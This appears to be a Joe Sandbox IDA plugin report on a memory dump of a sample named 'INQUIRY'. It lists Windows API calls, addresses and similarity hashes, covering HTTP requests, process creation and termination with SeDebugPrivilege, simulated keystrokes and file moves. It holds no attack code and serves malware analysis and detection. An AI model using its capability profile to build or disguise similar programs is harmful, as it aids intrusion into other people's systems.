Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: dcaf38347a3a165ce989006a5a84b9a624a43f382487031cc2bbc1312cf6e664
• Instruction ID: b9672c3b2f85054ac2231a17c2dc1709eb6d603a9d997d4cd833bdebdd6d8308
• Opcode Fuzzy Hash: dcaf38347a3a165ce989006a5a84b9a624a43f382487031cc2bbc1312cf6e664
• Instruction Fuzzy Hash: 5C71C135901205DFCF61CF64C884AEA7FB5FF88360F14427AED5A9A2A6D731C891DB60
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A81A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A81A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00A81ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A81AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A81AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00A81B10
• InternetCloseHandle.WININET(00000000), ref: 00A81B57
  • Part of subcall function 00A82483: GetLastError.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A82498
  • Part of subcall function 00A82483: SetEvent.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A824AD
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
• API String ID: 2603140658-3916222277
• Opcode ID: 6cc6c19b3b5bcbe8205b36220d2f94b8a47856c14a2c4bc1a74a8bbf9481ef2c
• Instruction ID: aeec4ef480ae0fefde3a0248a0f01d78095d0fab8779e24f3ccc0d90940a6e8f
• Opcode Fuzzy Hash: 6cc6c19b3b5bcbe8205b36220d2f94b8a47856c14a2c4bc1a74a8bbf9481ef2c
• Instruction Fuzzy Hash: 464151B1601219BFEB15AF90CC89FFB7BACFF08354F004126F9059A141EB749E569BA0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A9F910), ref: 00A88D28
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A9F910), ref: 00A88D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A88ED6
• SysFreeString.OLEAUT32(?), ref: 00A88F00
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: 256558fc720db08bfcaa7cdf38dc7f4a112df556fc4043af96c93d194cbcba66
• Instruction ID: 20c0f49d920591360d34f2fc9aaf9c1fe96193b0696e28089b25a04c970ac056
• Opcode Fuzzy Hash: 256558fc720db08bfcaa7cdf38dc7f4a112df556fc4043af96c93d194cbcba66
• Instruction Fuzzy Hash: 24F11971A00209EFDF14EF94C884EAEB7B9FF49314F148498F905AB251DB35AE46CB51
APIs
• _memset.LIBCMT ref: 00A8F6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A8FA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00A8FA7C
• CloseHandle.KERNEL32(?), ref: 00A8FAAB
• CloseHandle.KERNEL32(?), ref: 00A8FB22
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: fc39c15b9dce067d432027ae4be827321d2f3fa74ad783f0011574a64035887f
• Instruction ID: f5919a38f0029aa97f9de983c5131ebc64a71ddf60039b520375ebdabbc8e506
• Opcode Fuzzy Hash: fc39c15b9dce067d432027ae4be827321d2f3fa74ad783f0011574a64035887f
• Instruction Fuzzy Hash: ACE1CF31604301AFDB14EF24C991B6ABBE5EF85354F14896DF8999B2A2CB31EC41CB52
APIs
  • Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A73697,?), ref: 00A7468B
  • Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A73697,?), ref: 00A746A4
  • Part of subcall function 00A74A31: GetFileAttributesW.KERNEL32(?,00A7370B), ref: 00A74A32
• lstrcmpiW.KERNEL32(?,?), ref: 00A74D40
• _wcscmp.LIBCMT ref: 00A74D5A
• MoveFileW.KERNEL32(?,?), ref: 00A74D75
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
• Opcode ID: 8a0ed293621737558b03f3a2e19c14869f3a8d1f183e91289c065e59bf163a49
• Instruction ID: 17a1bebd542146c7d818361a80f365eb352e4305ad92cb74855a15416fc0cfc8
• Opcode Fuzzy Hash: 8a0ed293621737558b03f3a2e19c14869f3a8d1f183e91289c065e59bf163a49
• Instruction Fuzzy Hash: 805164B25083459BC724DBA0DD819DFB3ECAF88350F40892EF689D3152EF34A588C766
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A986FF
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: aee42792f1910ae9a30c9c2f9ec650731322edfb3192a7c8513ea1e1894243df
• Instruction ID: 59f6dc488658bbc7a09cc0cd0c455abe1ba9c2550447463bbbfd0b5df3c1e803
• Opcode Fuzzy Hash: aee42792f1910ae9a30c9c2f9ec650731322edfb3192a7c8513ea1e1894243df
• Instruction Fuzzy Hash: 77519030700244BEEF209F68CC89FAD7BE5EB06760F604116FA51EA1A1CF79E990DB50
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00A4C2F7
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A4C319
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A4C331
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00A4C34F
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A4C370
• DestroyIcon.USER32(00000000), ref: 00A4C37F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A4C39C
• DestroyIcon.USER32(?), ref: 00A4C3AB
  • Part of subcall function 00A9A4AF: DeleteObject.GDI32(00000000), ref: 00A9A4E8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                              • String ID:
                                                                                              • API String ID: 2819616528-0
                                                                                              • Opcode ID: 75b0591a2406aa11cc6f084258bd982b59e1fcadb9c401a1132171c982cd9b90
                                                                                              • Instruction ID: 4b75924ddda70174eafb452e32f3ce58e3ba1a181f90630aab52e8a2193b19ed
                                                                                              • Opcode Fuzzy Hash: 75b0591a2406aa11cc6f084258bd982b59e1fcadb9c401a1132171c982cd9b90
                                                                                              • Instruction Fuzzy Hash: 82515A74A05209AFDB20DF64CC45FAA77B5EB58321F104529F906DB290DBB0EDA1EB90
APIs
  • Part of subcall function 00A6A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A6A84C
  • Part of subcall function 00A6A82C: GetCurrentThreadId.KERNEL32 ref: 00A6A853
  • Part of subcall function 00A6A82C: AttachThreadInput.USER32(00000000,?,00A69683,?,00000001), ref: 00A6A85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00A6968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A696AB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00A696AE
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00A696B7
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A696D5
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A696D8
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00A696E1
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A696F8
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A696FB
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: 01d6324d6b6a337b8deb8e33c9b63c6cd08803c71a911055ddf35b0574f2c19a
• Instruction ID: 8e5518840fddc0a98a32a74eb38c1b38dde55e6ab6245a53896b407dd6a7b743
• Opcode Fuzzy Hash: 01d6324d6b6a337b8deb8e33c9b63c6cd08803c71a911055ddf35b0574f2c19a
• Instruction Fuzzy Hash: D111A571A50618BEF610AFA0DC49F6A7B2DDB4C751F210426F344EB0A1CDF25C51DAE4
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00A6853C,00000B00,?,?), ref: 00A6892A
• HeapAlloc.KERNEL32(00000000,?,00A6853C,00000B00,?,?), ref: 00A68931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A6853C,00000B00,?,?), ref: 00A68946
• GetCurrentProcess.KERNEL32(?,00000000,?,00A6853C,00000B00,?,?), ref: 00A6894E
• DuplicateHandle.KERNEL32(00000000,?,00A6853C,00000B00,?,?), ref: 00A68951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00A6853C,00000B00,?,?), ref: 00A68961
• GetCurrentProcess.KERNEL32(00A6853C,00000000,?,00A6853C,00000B00,?,?), ref: 00A68969
• DuplicateHandle.KERNEL32(00000000,?,00A6853C,00000B00,?,?), ref: 00A6896C
• CreateThread.KERNEL32(00000000,00000000,00A68992,00000000,00000000,00000000), ref: 00A68986
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 66266c02caa5479419734f5770831becf250543f70042cbca92fbf915903e40a
• Instruction ID: ce75455bbbc6ec68facd44359ca3170d355941cd8dadfbfa2439e8b2e1054b35
• Opcode Fuzzy Hash: 66266c02caa5479419734f5770831becf250543f70042cbca92fbf915903e40a
• Instruction Fuzzy Hash: A401A8B5340308FFEA10EBA5DC49F6B3BACEB89711F508522FB05DB1A1CA7498018A64
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: 2e0b747efca39109aad2dd0ff0ae56c4b0d3f6c4ece08b91fbcc9e8074a2a888
• Instruction ID: 172883ce6023e519751eafc0d9ceaaf50174efe83b1493d5c89fdc7f796a56eb
• Opcode Fuzzy Hash: 2e0b747efca39109aad2dd0ff0ae56c4b0d3f6c4ece08b91fbcc9e8074a2a888
• Instruction Fuzzy Hash: 90C17171A002199FDF10EFA8D984BBFB7F5FB48354F188469E905AB280E7719D45CB90
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-625585964
• Opcode ID: 2ccab14fca106b930b64b258d95259a6c538315347089591fe1b9bb10580fb8c
• Instruction ID: 913aeb16ae5bfd1c808f1877236aab283c8981618316f6ee4ecfe3c058c238de
• Opcode Fuzzy Hash: 2ccab14fca106b930b64b258d95259a6c538315347089591fe1b9bb10580fb8c
• Instruction Fuzzy Hash: 06918B71A00219ABDF24EFA5C848FEFBBB8EF85710F14855DF515AB280D7709945CBA0
APIs
  • Part of subcall function 00A6710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?,?,00A67455), ref: 00A67127
  • Part of subcall function 00A6710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67142
  • Part of subcall function 00A6710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67150
  • Part of subcall function 00A6710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?), ref: 00A67160
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00A89806
• _memset.LIBCMT ref: 00A89813
• _memset.LIBCMT ref: 00A89956
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00A89982
• CoTaskMemFree.OLE32(?), ref: 00A8998D
Strings
• NULL Pointer assignment, xrefs: 00A899DB
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1300414916-2785691316
• Opcode ID: 4dd437d06c00cd11e3fedc0834687bd58106c83adab82c14d9786c989318edc4
• Instruction ID: 19bed931f3508a149fc159afc112f24eb6497156b5f389485f487d225e6b8781
• Opcode Fuzzy Hash: 4dd437d06c00cd11e3fedc0834687bd58106c83adab82c14d9786c989318edc4
• Instruction Fuzzy Hash: 80913871D00229EBDB10EFA4DD84EEEBBB9BF08350F10415AF419A7291DB719A45CFA0
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A96E24
• SendMessageW.USER32(?,00001036,00000000,?), ref: 00A96E38
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A96E52
• _wcscat.LIBCMT ref: 00A96EAD
• SendMessageW.USER32(?,00001057,00000000,?), ref: 00A96EC4
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A96EF2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
• Opcode ID: 7ede6b6b0de1f188588cdd3f4ff02664cd335d3e3891f9dcf2f03e925d59d515
• Instruction ID: 10721924e1a63bcae014e737fe8375cb53fb598beb121a81852a84bd796c858d
• Opcode Fuzzy Hash: 7ede6b6b0de1f188588cdd3f4ff02664cd335d3e3891f9dcf2f03e925d59d515
• Instruction Fuzzy Hash: 58419E75B00348AFEF21DFA4CC85BEAB7E8EF08350F10082AF595E7291D6719D858B60
                                                                                              APIs
                                                                                                • Part of subcall function 00A73C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00A73C7A
                                                                                                • Part of subcall function 00A73C55: Process32FirstW.KERNEL32(00000000,?), ref: 00A73C88
                                                                                                • Part of subcall function 00A73C55: CloseHandle.KERNEL32(00000000), ref: 00A73D52
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A8E9A4
                                                                                              • GetLastError.KERNEL32 ref: 00A8E9B7
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A8E9E6
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A8EA63
                                                                                              • GetLastError.KERNEL32(00000000), ref: 00A8EA6E
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A8EAA3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00A73033
Strings
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A74312
• LoadStringW.USER32(00000000), ref: 00A74319
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A7432F
• LoadStringW.USER32(00000000), ref: 00A74336
• _wprintf.LIBCMT ref: 00A7435C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A7437A
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00A74357
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
APIs
  • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
• GetSystemMetrics.USER32(0000000F), ref: 00A9D47C
• GetSystemMetrics.USER32(0000000F), ref: 00A9D49C
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00A9D6D7
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A9D6F5
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A9D716
• ShowWindow.USER32(00000003,00000000), ref: 00A9D735
• InvalidateRect.USER32(?,00000000,00000001), ref: 00A9D75A
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00A9D77D
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000), ref: 00A12ACF
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00A12B17
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000), ref: 00A4C21A
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000), ref: 00A4C286
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00A770DD
  • Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
  • Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00A77114
• EnterCriticalSection.KERNEL32(?), ref: 00A77130
• _memmove.LIBCMT ref: 00A7717E
• _memmove.LIBCMT ref: 00A7719B
• LeaveCriticalSection.KERNEL32(?), ref: 00A771AA
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00A771BF
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00A771DE
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
APIs
• DeleteObject.GDI32(00000000), ref: 00A961EB
• GetDC.USER32(00000000), ref: 00A961F3
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A961FE
• ReleaseDC.USER32(00000000,00000000), ref: 00A9620A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A96246
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A96257
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A9902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00A96291
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A962B1
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
APIs
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
APIs
  • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
  • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
  • Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9
• _wcstok.LIBCMT ref: 00A7EC94
• _wcscpy.LIBCMT ref: 00A7ED23
• _memset.LIBCMT ref: 00A7ED56
Strings
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• IsWindow.USER32(010E5838), ref: 00A9B3EB
• IsWindowEnabled.USER32(010E5838), ref: 00A9B3F7
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A9B4DB
• SendMessageW.USER32(010E5838,000000B0,?,?), ref: 00A9B512
• IsDlgButtonChecked.USER32(?,?), ref: 00A9B54F
• GetWindowLongW.USER32(010E5838,000000EC), ref: 00A9B571
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A9B589
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
APIs
• _memset.LIBCMT ref: 00A8F448
• _memset.LIBCMT ref: 00A8F511
• ShellExecuteExW.SHELL32(?), ref: 00A8F556
  • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
  • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
  • Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9
• GetProcessId.KERNEL32(00000000), ref: 00A8F5CD
• CloseHandle.KERNEL32(00000000), ref: 00A8F5FC
Strings
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
APIs
• GetParent.USER32(?), ref: 00A70F8C
• GetKeyboardState.USER32(?), ref: 00A70FA1
• SetKeyboardState.USER32(?), ref: 00A71002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00A71030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00A7104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00A71095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A710B8
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(00000000), ref: 00A70DA5
• GetKeyboardState.USER32(?), ref: 00A70DBA
• SetKeyboardState.USER32(?), ref: 00A70E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A70E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A70E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A70EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A70EC9
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
APIs
  • Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A73697,?), ref: 00A7468B
  • Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A73697,?), ref: 00A746A4
• lstrcmpiW.KERNEL32(?,?), ref: 00A736B7
• _wcscmp.LIBCMT ref: 00A736D3
• MoveFileW.KERNEL32(?,?), ref: 00A736EB
• _wcscat.LIBCMT ref: 00A73733
• SHFileOperationW.SHELL32(?), ref: 00A7379F
Strings
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
APIs
• _memset.LIBCMT ref: 00A972AA
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A97351
